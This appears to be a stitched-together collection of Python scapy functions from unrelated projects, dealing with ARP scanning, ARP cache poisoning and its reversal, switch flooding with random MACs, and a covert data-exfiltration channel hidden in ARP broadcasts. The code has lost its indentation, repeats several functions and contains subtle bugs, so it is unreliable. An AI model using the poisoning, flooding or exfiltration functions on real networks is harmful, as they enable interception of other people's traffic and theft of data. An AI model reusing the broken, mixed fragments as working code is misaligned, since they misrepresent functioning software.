def _arp_ping(mac_address, ip_address):
result = False
answered,unanswered = srp(Ether(dst=mac_address)/ARP(pdst=ip_address), timeout=1, verbose=False)
if len(answered) > 0:
for reply in answered:
if reply[1].hwsrc == mac_address:
if type(result) is not list:
result = []
result.append(str(reply[1].psrc))
result = ', '.join(result)
return result
def gen_external_frames(interface: str, ip: str, ports: Union[list, tuple],
gateway: str) -> List[Ether]:
""" Generates external frames. Throws ARPError if gateway is down """
arp_resp = srp1(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=gateway),
timeout=5,
iface=interface,
verbose=0)
if not arp_resp:
raise ARPError(
f"Unable to find MAC for gateway IP {gateway}. Is it up?")
return [Ether(dst=arp_resp[ARP].hwsrc) / IP(dst=ip)]
def arping(iprange='192.168.30.0/24'):
"""ARPING function takes IP address or network, returns nested mac/ip list"""
conf.verb=0
ans,unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=iprange), timeout=2)
collection = []
for snd, rcv in ans:
result = rcv.sprintf(r"%ARP.psrc% %Ether.src%").split()
collection.append(result)
return collection
def scanNetwork():
target_ip = "10.0.0.1/24"
arp =ARP(pdst=target_ip)
ether=Ether(dst="ff:ff:ff:ff:ff:ff")
packet= ether/arp
result=srp(packet,timeout=5,verbose=0)[0]
clients=[]
for sent, received in result:
clients.append({'ip':received.psrc, 'mac':received.hwsrc})
logger.debug("MyView detected: %s", received.hwsrc)
return clients
def cleanup(victim_ip, gateway_ip):
"""
Send ARP response from gateway to victim to restore correct behavior
"""
gateway_mac = ip_to_mac(gateway_ip)
# gateway_ip says to victim_ip that "gateway_ip is at gateway_mac"
arp_gateway_to_victim = ARP(
op=ARP.is_at, pdst=victim_ip, psrc=gateway_ip,
hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gateway_mac
)
send(arp_gateway_to_victim, verbose=0)
def trick():
pk = Ether(src=Config["my_mac"], dst=Config["phone_mac"]) / ARP(
hwsrc=Config["my_mac"],
psrc=Config["gate_ip"],
hwdst=Config["phone_mac"],
pdst=Config["phone_ip"],
op=2)
for i in range(50):
sendp(pk, iface=argv["interface"])
pk_to_router = Ether(src=Config["my_mac"], dst=Config["gate_mac"]) / ARP(
hwsrc=Config["my_mac"],
psrc=Config["phone_ip"],
hwdst=Config["gate_mac"],
pdst=Config["gate_ip"],
op=2)
for i in range(50):
sendp(pk_to_router, iface=argv["interface"])
def poison(iface, target, fake, n, s=1):
ethernet = Ether()
arp = ARP(pdst=target, psrc=fake, op="is-at")
packet = ethernet / arp
while n:
sendp(packet, iface=iface)
n -= 1
time.sleep(s)
def restore(router_ip, router_mac, target_ip, target_mac, interface):
send(ARP(op=2,
psrc=target_ip,
hwsrc=target_mac,
pdst=router_ip,
hwdst='ff:ff:ff:ff:ff:ff'),
iface=interface,
count=5,
inter=0.2,
verbose=0)
send(ARP(op=2,
psrc=router_ip,
hwsrc=router_mac,
pdst=target_ip,
hwdst='ff:ff:ff:ff:ff:ff'),
iface=interface,
count=5,
inter=0.2,
verbose=0)
def process_pkt(self, pkt):
a = pkt[ARP]
# op is a arp lookup
if a.op == 1 and a.pdst == self.gateway_ip:
res = Ether(src=self.gateway_mac, dst=a.hwsrc) / ARP(
op="is-at",
psrc=self.gateway_ip,
hwsrc=self.gateway_mac,
pdst=a.psrc,
hwdst=a.hwsrc)
self.int_sock.send(res)
def get_mac(ip):
"""Returns MAC address of any device connected to the network
Similar as arp_scan() but it returns directly MAC address and not a list with other informations
Args:
ip (string): the ip of the victim
"""
request = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip)
ans, _ = srp(request, timeout=2, retry=1, verbose=0)
if ans:
return ans[0][1].src
def rearp(self):
for i in range(0, 2):
sendp((Ether(src=self.SpoofedMacs[i],
dst=self.SpoofedMacs[(i + 1) % 2]) /
ARP(op=2,
hwsrc=self.SpoofedMacs[i],
psrc=self.SpoofedIps[i],
hwdst=self.SpoofedMacs[(i + 1) % 2],
pdst=self.SpoofedIps[(i + 1) % 2])),
count=5,
verbose=0)
def arping(iprange, interface):
ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=iprange),
iface=interface,
timeout=2)
print "\n IP <---> MAC\n"
collection = []
for snd, rcv in ans:
result = rcv.sprintf(r"%ARP.psrc% %Ether.src%").split()
collection.append(result)
return collection
def arp_scan(self):
ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") /
ARP(pdst=self.network),
timeout=self.config['scan_timeout'],
retry=self.config['scan_retries'])
for pck in ans:
arp = pck[1]['ARP']
self.hosts.append(
Host(arp.psrc, arp.hwsrc, self.config, self.network,
self.gateway))
def broadcast_message(message, key=PYEXFIL_DEFAULT_PASSWORD):
"""
Send a message over ARP Broadcast
:param message: Message to send as str.
:param key: The parameter to use as key.
:return None:
"""
msg = AESEncryptOFB(key=key, text=message)
n_frame = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(
op=1, pdst="192.168.1.254") / Raw(load=msg)
sendp(n_frame, verbose=False)
def __init__(self, ip, mac):
ether = Ether()
ether.src = mac # Default: network card mac
arp = ARP()
arp.op = arp.is_at
arp.psrc = ip
arp.hwsrc = mac
self.arp = arp
self.ether = ether
def get_mac_by_ip(interface, address):
"""
Resolves hardware address from IP by sending ARP request
and receiving ARP response
"""
# ARP packet with operation 1 (who-is)
packet = ARP(op=1, pdst=address)
response = sr1(packet, timeout=3, verbose=0, iface=interface)
if response is not None:
return response.hwsrc
def get_mac_list(ip, interface, timeout=5, interval=0.3):
available_mac_addresses = {}
print(ip)
ans, unans = srp(Ether(dst='ff:ff:ff:ff:ff:ff') / ARP(pdst=str(ip)),
timeout=timeout,
iface=interface,
inter=interval)
for snd, rcv in ans:
available_mac_addresses[rcv.sprintf(r"%Ether.src%")] = rcv.sprintf(
r"%ARP.psrc%")
return available_mac_addresses
def arp_poison_callback(packet):
# Got ARP request?
if packet[ARP].op == 1:
answer = Ether(dst=packet[ARP].hwsrc) / ARP()
answer[ARP].op = 'is-at'
answer[ARP].hwdst = packet[ARP].hwsrc
answer[ARP].psrc = packet[ARP].pdst
answer[ARP].pdst = packet[ARP].psrc
print("Fooling " + packet[ARP].psrc + " that " + packet[ARP].pdst +
" is me")
sendp(answer, iface=sys.argv[1])
def get_mac(ip):
"""
Renvoie l'adresse MAC associée à l'adresse IP.
"""
p = Ether(dst=BROADCAST) / ARP(
pdst=IP
) # On construit un paquet ARP qu'on broadcast pour demander qui a cette IP?
ans = srp(p, timeout=3, verbose=False)[
0] # envoie & reçoit le paquet p et on récupère les réponses à p
return ans[0][1].hwsrc # on retourne l'adresse MAC.
def _return_to_normal(self):
"""This method is called when the daemon is stopping.
First, sends a GARP broadcast request to all clients to tell them the real gateway.
Then an ARP request is sent to every client, so that they answer the real gateway and update its ARP cache.
"""
# clients gratutious arp
sendp(
Ether(dst=ETHER_BROADCAST) / ARP(op=1,
psrc=self.ipv4.gateway,
pdst=self.ipv4.gateway,
hwdst=ETHER_BROADCAST,
hwsrc=self.ipv4.gate_mac))
def restore(target_ip, host_ip, verbose=True):
target_mac = get_mac(target_ip)
host_mac = get_mac(host_ip)
arp_response = ARP(pdst=target_ip,
hwdst=target_mac,
psrc=host_ip,
hwsrc=host_mac)
send(arp_response, verbose=0, count=7)
if verbose:
print("[+] Sent to {} : {} is-at {}".format(
target_ip, host_ip, host_mac))
def execute(self):
config = get_config()
self_ip = sr1(IP(dst="1.1.1.1", ttl=1) / ICMP(), verbose=0, timeout=config.network_timeout)[IP].dst
arp_responses, _ = srp(
Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(op=1, pdst=f"{self_ip}/24"), timeout=config.netork_timeout, verbose=0,
)
# arp enabled on cluster and more than one pod on node
if len(arp_responses) > 1:
# L3 plugin not installed
if not self.detect_l3_on_host(arp_responses):
self.publish_event(PossibleArpSpoofing())
def originalMAC(IPaddr):
# src --> maybe.. send packet and return output
# 'op = 1' --> ARP request mode
# 'timeout = 2' --> If 'ARP reply' is none for 2 secs, stop sending 'ARP request'.
# 'verbose = 0' --> srp's report is hidden
ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(op=1, pdst=IPaddr),
timeout=2,
iface=interface,
verbose=0)
for send, receive in ans:
MACaddr = receive[Ether].src
return MACaddr
def scan(ip=None):
if ip is None:
ip = "192.168.2.0/24"
arp_request = ARP(pdst=ip)
broadcast = Ether(dst="ff:ff:ff:ff:ff:ff")
arp_request_broadcast = broadcast/arp_request
answered_list = srp(arp_request_broadcast, timeout=1, verbose=False)[0]
clients_list = []
for element in answered_list:
client_dict = {"ip": element[1].psrc, "mac": element[1].hwsrc}
clients_list.append(client_dict)
return clients_list
def scanSubnet(ip):
arp_pkt = Ether() / ARP()
arp_pkt[ARP].pdst = ip
arp_pkt[Ether].dst = "ff:ff:ff:ff:ff:ff"
response = srp(arp_pkt, timeout=6, verbose=0)[0]
hostsIPs = []
hostsMACs = []
for sent, received in response:
hostsIPs.append(received.psrc)
hostsMACs.append(received.src)
return hostsIPs, hostsMACs
def spam(self):
""" Begin spamming the switch with ARP packets from
random MAC's
"""
arp = ARP(op=2, psrc='0.0.0.0', hwdst=self.switch)
while self.running:
pkt = Ether(src=RandMAC(), dst=self.switch)
pkt /= arp
sendp(pkt)
self.sent += 1
if self.sent % 50 == 0:
self.log_msg('Sent %d requests...' % (self.sent))
def arping(iface, ip):
result = ""
ans, uans = srp(Ether(dst="FF:FF:FF:FF:FF:FF") / ARP(pdst=ip),
timeout=2,
inter=0.1,
verbose=False,
iface=iface)
if len(ans) > 0:
for snd, rcv in ans:
result = rcv.sprintf(r"%Ether.src%")
return result
def _arp_ping(mac_address, ip_address):
result = False
answered, unanswered = srp(Ether(dst=mac_address) /
ARP(pdst=ip_address),
timeout=1,
verbose=False)
if len(answered) > 0:
for reply in answered:
result = []
result.append(str(reply[0].pdst))
result = ', '.join(result)
return result
def execute(self):
self_ip = sr1(IP(dst="1.1.1.1", ttl=1), ICMP(), verbose=0)[IP].dst
arp_responses, _ = srp(Ether(dst="ff:ff:ff:ff:ff:ff") /
ARP(op=1, pdst="{}/24".format(self_ip)),
timeout=3,
verbose=0)
# arp enabled on cluster and more than one pod on node
if len(arp_responses) > 1:
# L3 plugin not installed
if not self.detect_l3_on_host(arp_responses):
self.publish_event(PossibleArpSpoofing())
def rearp_targets(signal, frame):
"""Function to rearp targets when SIGNINT signal is fired.
Arguments:
signal {signal} -- Signal
frame {frame} -- Stack frame or execution frame
"""
sleep(1)
p_success("\n[+] Rearping Targets")
r_mac = getmacbyip(host)
pkt = Ether(src=r_mac, dst="ff:ff:ff:ff:ff:ff") / ARP(
psrc=host, hwsrc=if_mac, op=2)
sendp(pkt, inter=1, count=3, iface=interface)
if args.reverse:
t_mac = getmacbyip(args.target)
r_pkt = Ether(src=t_mac, dst="ff:ff:ff:ff:ff:ff") / ARP(
psrc=args.target, hwsrc=if_mac, op=2)
sendp(r_pkt, inter=1, count=2, iface=interface)
p_success("[+] Exiting!")
sys.exit(0)
